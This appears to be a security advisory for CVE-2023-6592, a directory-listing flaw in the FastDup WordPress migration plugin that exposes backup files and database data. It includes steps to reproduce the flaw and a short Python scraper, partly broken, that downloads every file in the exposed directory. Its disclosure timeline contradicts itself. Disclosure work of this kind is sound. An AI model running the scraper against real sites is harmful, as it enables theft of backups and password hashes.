A critical vulnerability has been unearthed within the FastDup – Fastest WordPress Migration & Duplicator plugin, residing in the directory wordpress/wp-content/njt-fastdup/packages. This vulnerability exposes a plethora of information about the WordPress site, encompassing its configuration details, directories, and files. More alarmingly, it allows unauthorized access to sensitive data housed within the database, including user passwords. The severity of this flaw is exemplified by the imminent threat it poses, creating a gateway for potential brute force attacks on password hashes and, consequently, the entire compromise of the system.

Main info:

PluginFastDup – Fastest WordPress Migration & Duplicator < 2.2
CriticalSuper High
All Time48 596
Active installations4 000+
Publicly PublishedJanuary 16, 2023
Last UpdatedJanuary 16, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A3: Sensitive Data Exposure
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6592
Plugin Security Certification by CleanTalk


November 22, 2023Plugin testing and vulnerability detection in the FastDup – Fastest WordPress Migration & Duplicator have been completed
November 22, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
January 8, 2023The author fixed the vulnerability and released the plugin update
January 16, 2023Registered CVE-2023-6592

Discovery of the Vulnerability

A severe vulnerability has been discovered in the directory wordpress/wp-content/njt-fastdup/packages. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.

Understanding of Directory Listing attack’s

Directory listing vulnerabilities, such as the one discovered in FastDup, occur when a web server is configured to show the contents of a directory when no index file is present. In WordPress, this can lead to the exposure of sensitive information stored within directories. Real-world examples of this vulnerability include unauthorized access to critical files, configuration details, and in the case of FastDup, the potential compromise of database contents and user passwords.

Exploiting the Directory Listing Vulnerability

Exploiting this directory listing vulnerability involves navigating to the exposed directory, wordpress/wp-content/njt-fastdup/packages, and gaining unauthorized access to the wealth of information contained therein. An attacker could leverage this access to extract sensitive database data, including hashed passwords. The compromised data could then be used in potential brute force attacks, jeopardizing the security of user accounts and, consequently, the entire WordPress system.


1) Run backup function http://your_site/wordpress/wp-admin/admin.php?page=njt-fastdup#/

2) During backup creation, you can intercept the following paths:



3) After backup go to /wordpress/wp-content/njt-fastdup/packages/ and see all backup files inside directory

EXPLOIT (python3):

import requests
from bs4 import BeautifulSoup
import time

url = ""

def check_files():
    # Perform an HTTP request
    response = requests.get(url)

    # Check the success of the request
    if response.status_code == 200:
        # Use BeautifulSoup to parse the HTML
        soup = BeautifulSoup(response.text, 'html.parser')

        # Find all links to files
        file_links = soup.find_all('a', href=True)

        if file_links:
            for link in file_links:
                file_url = url + link['href']

                # Perform an HTTP request to download the file
                file_response = requests.get(file_url)

                if file_response.status_code == 200:
                    # Output the file name
                    print("File Name:", link['href'])

                    # Output the file content
                    print("File Content:", file_response.text)
                    print("-" * 50)
                    print(f"Failed to retrieve the file {link['href']}")
            print("There are no files in the directory.")
        print(f"Failed to access {url}. Response code: {response.status_code}")

# Infinite loop with a check every 3 seconds
while True:


The potential risks associated with this vulnerability are severe and multifaceted. In real-world scenarios, attackers could:

  • Unauthorized Access: Attackers can gain unrestricted access to critical information stored within the exposed directory, potentially compromising sensitive data.
  • Database Compromise: The vulnerability extends to the database, posing a significant risk of unauthorized access and extraction of sensitive information, including user passwords.
  • Brute Force Attacks: The exposed user passwords could be subjected to brute force attacks, leading to unauthorized account access and potential system compromise.

This vulnerability not only jeopardizes the immediate security of the affected WordPress site but could also lead to broader consequences if the compromised data is used maliciously.

Recommendations for Improved Security

  • Immediate Patching: Developers should urgently release a patch or update that rectifies this specific directory listing vulnerability.
  • Directory Permissions: Review and adjust directory permissions to restrict unauthorized access, preventing directory listing.
  • Password Security: Encourage or enforce robust password policies, including the use of strong, unique passwords and periodic changes.
  • Security Audits: Conduct thorough security audits to identify and rectify any other potential vulnerabilities within the WordPress system.

By implementing these measures, administrators can significantly enhance the security of their WordPress sites, mitigating the risks associated with the FastDup directory listing vulnerability.

#WordPressSecurity #DirectoryLisitng #WebsiteSafety #StayProtected #SuperHighVulnerability

Use CleanTalk solutions to improve the security of your website


Create your CleanTalk account

By signing up, you agree with license. Have an account? Log in.
CVE-2023-6592 – FastDup – Fastest WordPress Migration & Duplicator – Unauth Sensitive Data Exposure and Database/ Users password leak – POC/Exploit

Leave a Reply

Your email address will not be published. Required fields are marked *